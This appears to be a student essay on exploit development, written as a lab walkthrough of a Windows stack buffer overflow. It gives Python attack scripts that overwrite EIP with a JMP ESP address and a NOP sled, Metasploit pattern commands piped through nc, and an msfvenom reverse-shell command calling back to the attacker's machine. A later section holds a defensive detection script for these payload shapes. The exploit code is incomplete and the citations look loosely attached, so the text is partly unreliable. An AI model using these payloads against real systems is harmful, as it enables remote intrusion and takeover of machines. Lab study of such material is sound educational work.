This article discusses the process of exploit development and privilege escalations in ICT Ethical Hacking. It covers the phases of development, including initiation, overflow, and weaponizing the vulnerability. The article also provides insights into the shellcode and references for further reading.
Running head: ICT ETHICAL HACKING
ICT Ethical Hacking
Name of the Student
Name of the University
Author Note
Exploit development is used to gain control over a computer system by finding bugs and vulnerabilities and taking advantage of them. The process allows privilege escalation and denial-of-service attacks (Thomas, Burmeister & Low, 2017). Development proceeds in several phases, and each phase must be completed before the next one can begin.

Initiation phase:
A Linux platform is used for the entire development process. The Kali virtual machine is accessed first, followed by the Win32 buffer victim virtual machine (Wang & Yang, 2017). The IP addresses of both machines are then checked after setting up NAT networking.

Overflow:

    #!/usr/bin/python
    import sys
    import os
    import socket

    host = sys.argv[1]
    port = int(sys.argv[2])

    # Testing
    buffer = "\x41"*500

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con = s.connect((host, port))
    s.send(buffer)
    s.close()

server.exe is opened in Immunity Debugger on the Windows host, and pressing F9 starts its execution. A Python file named 'attack.py' is then created containing the code above and run with the command "python attack.py IP_ADDRESS 1337" (Sinha, 2017). The IP address used is that of the Windows virtual machine. After the script has run, switch to the Windows environment and press SHIFT+F9 to pass the exception.
From the figure above, we can see that EIP and EBP contain the required value. The ESP value points to the memory containing the injected value.

Weaponizing the vulnerability:
Press CTRL+F2 to restart server.exe within Immunity Debugger, then press F9 to start execution (Li et al., 2018). Within Kali, change to the Metasploit tools directory by running "cd /usr/share/metasploit-framework/tools/exploit", then run "./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337". This is how the IP addresses for both the Windows virtual machine and the physical machine are matched. Then press SHIFT+F9 within Immunity Debugger to pass the exception. Run "./pattern_offset.rb -l 5000 -q 37694136" within Kali to determine the offset of EIP. The code that will jump to ESP now needs to be determined. attack.py is then modified as follows:

    #!/usr/bin/python
    import sys
    import os
    import socket

    host = sys.argv[1]
    port = int(sys.argv[2])

    # EIP is overwritten at 260 bytes
    buffer = "\x41"*260
    # Overwrite EIP with JMP ESP
    buffer += "\x78\x16\xF3\x77"
    # NOPSLED
    buffer += "\x90"*128
    # Shellcode
    buffer +=

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    con = s.connect((host, port))
    s.send(buffer)
    s.close()

Shellcode
1. Enter Kali.
2. Run the command "msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python", where <KALI_IP> is the IP address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.
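The traffic this walkthrough generates has recognizable shapes on the wire. The following detection sketch is an added example, not part of the original document: it flags the three payload shapes described above (the 0x41 filler probe, pattern_create.rb output, and a 0x90 sled) in a captured TCP payload. The thresholds, names and sample payloads are constructed assumptions.

```python
import re

# Thresholds are assumptions for this example; tune them against real traffic.
MIN_FILLER_RUN = 64      # identical bytes in a row (the probe above sends 500 x 0x41)
MIN_NOP_RUN = 32         # consecutive 0x90 bytes (the sled above is 128 bytes)
MIN_CYCLIC_TRIPLETS = 8  # Upper-lower-digit triplets, the shape of pattern_create.rb output

# A run of one repeated byte other than 0x90 (the sled has its own rule).
_FILLER = re.compile(rb"([^\x90])\1{%d,}" % (MIN_FILLER_RUN - 1))
_NOPS = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)
_CYCLIC = re.compile(rb"(?:[A-Z][a-z][0-9]){%d,}" % MIN_CYCLIC_TRIPLETS)


def indicators(payload):
    """Return the overflow-probe indicators found in one TCP payload (bytes)."""
    found = []
    if _FILLER.search(payload):
        found.append("repeated-byte filler")
    if _CYCLIC.search(payload):
        found.append("cyclic pattern")
    if _NOPS.search(payload):
        found.append("NOP sled")
    return found


# Constructed sample payloads (not captured traffic).
SAMPLES = {
    "benign request": b"GET /status HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "filler probe": b"\x41" * 500,
    "cyclic pattern": b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1",
    # Placeholder bytes stand in for the 4-byte return address.
    "filler + sled": b"\x41" * 260 + b"\x00" * 4 + b"\x90" * 128,
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:15} {len(payload):4d} bytes -> {indicators(payload) or 'clean'}")
```

The cyclic-pattern rule can also match some encoded data such as base64, so treat a hit as a signal to correlate with a crash or exception on the target service rather than as proof on its own.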
References
Li, L., Li, Z., Shahriar, H., Rutherfoord, R., Peltsverger, S., & Tatum, D. (2018). Ethical Hacking: Network Security and Penetration Testing.
Sinha, S. (2017). Python 3 and Ethical Hacking. In Beginning Ethical Hacking with Python (pp. 37-38). Apress, Berkeley, CA.
Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. In Proceedings of The 28th Australasian Conference on Information Systems, December (pp. 4-6).
Wang, Y., & Yang, J. (2017, March). Ethical Hacking and Network Defense: Choose Your Best Network Vulnerability Scanning Tool. In Advanced Information Networking and Applications Workshops (WAINA), 2017 31st International Conference on (pp. 110-113). IEEE.